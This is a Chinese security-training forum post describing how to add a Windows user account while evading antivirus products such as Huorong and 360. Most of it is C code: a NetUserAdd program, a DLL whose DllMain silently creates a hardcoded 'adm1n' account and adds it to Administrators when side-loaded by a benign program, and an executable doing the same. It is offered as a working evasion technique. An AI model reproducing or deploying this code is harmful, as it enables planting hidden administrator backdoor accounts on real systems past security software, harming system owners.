设为首页收藏本站
切换到窄版

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
暗月安全培训论坛»论坛 安全板块 安全文章 绕过杀软添加用户
返回列表 发新帖
查看: 63|回复: 0

[原创] 绕过杀软添加用户

[复制链接]
月师傅

91

主题

0

回帖

371

积分

管理员

积分
371
发表于 2025-12-9 15:48:41 | 显示全部楼层 |阅读模式
绕过杀软添加用户
一、概述
在渗透过的过程 少不了要添加账号,现在防护软件都会对添加用户的操作进行拦截。
在终端中执行添加用户命令  net user moonsec sb123 /add火绒会对此操作进行拦截。
二、绕过
上传net1.exe 或 net.exe 对此进行重名  到别的路径执行该命令也是拦截。
在winapi中 提供添加用户函数 https://learn.microsoft.com/en-us/windows/win32/api/lmaccess/nf-lmaccess-netuseradd 并且提供了代码
  1. #ifndef UNICODE
  2. #define UNICODE
  3. #endif
  4. #pragma comment(lib, "netapi32.lib")

  6. #include <stdio.h>
  7. #include <windows.h>
  8. #include <lm.h>

  10. int wmain(int argc, wchar_t *argv[])
  11. {
  12.    USER_INFO_1 ui;
  13.    DWORD dwLevel = 1;
  14.    DWORD dwError = 0;
  15.    NET_API_STATUS nStatus;

  17.    if (argc != 3)
  18.    {
  19.       fwprintf(stderr, L"Usage: %s \\\\ServerName UserName\n", argv[0]);
  20.       exit(1);
  21.    }
  22.    //
  23.    // Set up the USER_INFO_1 structure.
  24.    //  USER_PRIV_USER: name identifies a user,
  25.    //    rather than an administrator or a guest.
  26.    //  UF_SCRIPT: required
  27.    //
  28.    ui.usri1_name = argv[2];
  29.    ui.usri1_password = argv[2];
  30.    ui.usri1_priv = USER_PRIV_USER;
  31.    ui.usri1_home_dir = NULL;
  32.    ui.usri1_comment = NULL;
  33.    ui.usri1_flags = UF_SCRIPT;
  34.    ui.usri1_script_path = NULL;
  35.    //
  36.    // Call the NetUserAdd function, specifying level 1.
  37.    //
  38.    nStatus = NetUserAdd(argv[1],
  39.                         dwLevel,
  40.                         (LPBYTE)&ui,
  41.                         &dwError);
  42.    //
  43.    // If the call succeeds, inform the user.
  44.    //
  45.    if (nStatus == NERR_Success)
  46.       fwprintf(stderr, L"User %s has been successfully added on %s\n",
  47.                argv[2], argv[1]);
  48.    //
  49.    // Otherwise, print the system error.
  50.    //
  51.    else
  52.       fprintf(stderr, "A system error has occurred: %d\n", nStatus);

  54.    return 0;
  55. }
复制代码
改进代码 dll版本
  1. #include "pch.h"
  2. #include <Windows.h>
  3. #include <lm.h>
  4. #include <iostream>
  5. #include <fstream>

  7. #pragma comment(lib, "netapi32.lib")

  9. wchar_t username[256] = L"adm1n";
  10. wchar_t password[256] = L"P@ssw0rd";

  12. BOOL APIENTRY DllMain( HMODULE hModule,
  13.                        DWORD  ul_reason_for_call,
  14.                        LPVOID lpReserved
  15.                      )
  16. {
  17.     // Create the user
  18.     USER_INFO_1 user;
  19.     memset(&user, 0, sizeof(USER_INFO_1));
  20.     user.usri1_name = username;
  21.     user.usri1_password = password;
  22.     user.usri1_priv = USER_PRIV_USER;
  23.     user.usri1_flags = UF_DONT_EXPIRE_PASSWD;
  24.     NetUserAdd(NULL, 1, (LPBYTE)&user, NULL);

  26.     // Add the user to the administrators group
  27.     LOCALGROUP_MEMBERS_INFO_3 members;
  28.     members.lgrmi3_domainandname = username;
  29.     NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&members, 1);
  30. }
复制代码
这个版本可以用白程序加载dll执行 可以过掉一部分杀软。
也可以exe版本
  1. #ifndef UNICODE
  2. #define UNICODE
  3. #endif
  4. #pragma comment(lib, "netapi32.lib")

  6. #include <stdio.h>
  7. #include <windows.h>
  8. #include <lm.h>

  10. int wmain(int argc, wchar_t* argv[])
  11. {
  12.     USER_INFO_1 ui;
  13.     DWORD dwLevel = 1;
  14.     DWORD dwError = 0;
  15.     NET_API_STATUS nStatus;

  17.     if (argc != 3)
  18.     {

  20.         fwprintf(stderr, L"Usage:.%s <username> <password>\n", argv[0]);
  21.         exit(1);
  22.     }

  24.     ui.usri1_name = argv[1];
  25.     ui.usri1_password = argv[2];
  26.     ui.usri1_priv = USER_PRIV_USER;
  27.     ui.usri1_home_dir = NULL;
  28.     ui.usri1_comment = NULL;
  29.     ui.usri1_flags = UF_SCRIPT;
  30.     ui.usri1_script_path = NULL;

  32.     nStatus = NetUserAdd(NULL,
  33.         dwLevel,
  34.         (LPBYTE)&ui,
  35.         &dwError);

  37.     if (nStatus == NERR_Success)
  38.         fwprintf(stderr, L"User %s has been successfully added\n", argv[1]);

  40.     else
  41.         fprintf(stderr, "A system error has occurred: %d\n", nStatus);

  43.     LOCALGROUP_MEMBERS_INFO_3 account;
  44.     account.lgrmi3_domainandname = argv[1];

  46.     NET_API_STATUS Status = NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1);

  48.     if (Status == NERR_Success || Status == ERROR_MEMBER_IN_ALIAS) {
  49.         printf("Administrators added Successfully!");
  50.     }
  51.     else {
  52.         printf("Administrators added Failed!");
  53.     }
  54.     return 0;
  55. }
复制代码
编译生成后 执行 大多少都可以过 例如火绒 360有些版本能过。
源码下载







本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|暗月安全培训论坛

GMT+8, 2026-1-8 16:33 , Processed in 0.054854 second(s), 19 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表